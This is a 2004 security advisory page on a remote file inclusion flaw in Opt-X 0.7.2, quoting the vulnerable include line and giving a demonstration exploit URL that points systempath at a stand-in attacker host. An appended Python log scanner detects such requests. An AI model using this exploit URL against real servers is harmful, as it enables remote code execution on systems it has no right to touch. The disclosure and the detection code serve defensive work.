SecurityTracker.com
Category:   Application (Generic)  >   Opt-X
Vendors:   Opt-X Project
Opt-X Include File Hole Lets Remote Users Execute Arbitrary Code on the Target System
SecurityTracker Alert ID:  1009194
SecurityTracker URL:  http://securitytracker.com/id/1009194
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 24 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.7.2
Description:   G00db0y from Zone-h Security Labs reported an include file vulnerability in Opt-X. A remote user can execute arbitrary PHP code on the target system.

It is reported that the '/includes/header.php' file includes the '/includes/menu.php' file relative to the $systempath variable. A remote user can specify a remote location for the $systempath variable to cause '/includes/menu.php' on the remote location to be included and executed on the target system with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/path_of_optx/includes/header.php?systempath=http://[attackersite]/

The vendor has reportedly been notified.

Impact:   A remote user can cause arbitrary PHP code, including operating system commands, to be executed on the target system with the privileges of the web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.opt-x.org/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  ZH2004-10SA (security advisory): file inclusion vulnerability in


ZH2004-10SA (security advisory): file inclusion vulnerability in Opt-X

Discovered: 10 February 2004

Vendor contacted: 15 February 2004

Published: 24 February 2004

Name: Opt-X

Affected System: 0.7.2

Issue: file inclusion vulnerability

Author: G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org

Vendor: http://www.opt-x.org/




Description

**********

Zone-H Security Team has discovered a flaw in Opt-X. There is a vulnerability in the 
current version of Opt-X that allows an attacker to influence the include path for PHP
scripts. This could be exploited to include a malicious script that is hosted on an 
attacker-controlled server, allowing for execution of arbitrary code in the context of
the web server. "Opt-X is primarily a network monitoring tool for content/urls and network 
services, but it also has some other functions such as, task list, server list,
log changes for servers and a vendor list".




Details

**********

There's a file inclusion vulnerability in the /includes/header.php file, line 57:


<?php include("".$systempath."/includes/menu.php"); ?>


It is possible for a remote attacker to include an external file and execute arbitrary 
commands with the privileges of the webserver (nobody by default).


To test the vulnerability try this:

http://vulnerablesite/path_of_optx/includes/header.php?systempath=http://attackersite/


In this way the file "http://attackersite/includes/menu.php" will be included and executed 
on the vulnerable server.



Solution

**********

The vendor has been contacted and a patch was not yet produced.


---

G00db0y from Zone-h Security Labs - g00db0y@zone-h.org - zetalabs@zone-h.org




http://www.zone-h.org/en/advisories/read/id=4036/
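
With no fix available at the time of this entry, one way to check whether a site was probed is to search the web server access log for requests that supply `systempath` in the query string. The Python example below is added here and is not part of the advisory or of Opt-X. It assumes Apache common log format and that Opt-X never legitimately receives `systempath` from a request; the `/optx/` install path, the function name and the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# Apache/NCSA common log format: client ident user [time] "request" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3})')
# Network URL wrappers that PHP's include() can fetch from
REMOTE_RE = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)


def find_systempath_abuse(log_lines, param="systempath"):
    """Return (client, path, value, status, kind) for each suspicious request."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log entry
        client, target, status = m.groups()
        path, _, query = target.partition("?")
        # parse_qsl percent-decodes once, as PHP does with the query string
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name != param:  # PHP variable names are case-sensitive
                continue
            # A URL value points the include at another host; any other value
            # still overrides the include path from outside (assumed never legitimate)
            kind = "remote-include" if REMOTE_RE.match(value) else "path-override"
            hits.append((client, path, value, int(status), kind))
    return hits


# Constructed sample log lines (documentation address ranges, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Feb/2004:09:00:01 +0000] "GET /optx/index.php HTTP/1.1" 200 4312',
    '198.51.100.23 - - [24/Feb/2004:09:02:11 +0000] '
    '"GET /optx/includes/header.php?systempath=http://203.0.113.7/ HTTP/1.0" 200 731',
    '198.51.100.23 - - [24/Feb/2004:09:02:15 +0000] '
    '"GET /optx/includes/header.php?systempath=HTTP%3A%2F%2F203.0.113.7%2F HTTP/1.0" 200 731',
    '198.51.100.40 - - [24/Feb/2004:09:05:40 +0000] '
    '"GET /optx/includes/header.php?systempath=/tmp HTTP/1.0" 200 0',
    '192.0.2.10 - - [24/Feb/2004:09:06:02 +0000] '
    '"GET /optx/search.php?q=http://example.org/ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in find_systempath_abuse(SAMPLE_LOG):
        print(hit)
```

A status of 200 on a flagged request means header.php was served, not that the include succeeded; hits need to be correlated with outbound connections from the web server.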



 
 



Copyright 2021, SecurityGlobal.net LLC